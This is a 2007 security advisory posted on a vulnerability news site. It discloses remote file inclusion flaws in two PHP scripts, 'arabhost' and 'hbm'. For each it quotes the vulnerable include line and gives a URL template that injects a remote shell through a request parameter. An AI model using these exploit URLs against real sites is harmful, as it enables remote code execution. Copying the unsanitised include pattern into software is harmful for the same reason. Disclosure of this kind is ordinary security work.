Computer Security

Security Advisory: Hasadya Raed
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  FlashGameScript v1.5.4  Remote File Inclusion Vulnerability

  JBrowser acces to admin/config files

  WebSpell > 4.0 Authentication Bypass and arbitrary code execution

  Online Web Building v2.0 (id) Remote SQL Injection

From:RaeD Hasadya <raed_(at)_bsdmail.com>
Date:23.02.2007
Subject:Hasadya Raed

Remote Incluude File :

By Hasadya Raed
Contact : RaeD@BsdMail.Com
Author : Hasadya Raed

Script : arabhost
Download : http://delmaa.com/upfile/users/arabHost.zip

B.File :
function.php

V.Code :
include($adminfloder");

Expl : http://www.victim.com/path/function.php?adminfolder=[Shell-Attack]

---------------------------------------------------------------------------------
-----------------------------------------
---------------------------------------------------------------------------------
-----------------------------------------

By Hasadya Raed
Contact : RaeD@BsdMail.Com
Author : Hasadya Raed

Script : hbm

B.File :
view.php

V.Code :
require($header_html");

Expl : http://www.victim.com/path/view.php?hbmpath=[Shell-Attack]



------------------------------------
By Hasadya Raed
Contact: RaeD@BsdMail.Com
------------------------------------


--
_______________________________________________
Get your free email from http://bsdmail.com
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
 


Рейтинг@Mail.ru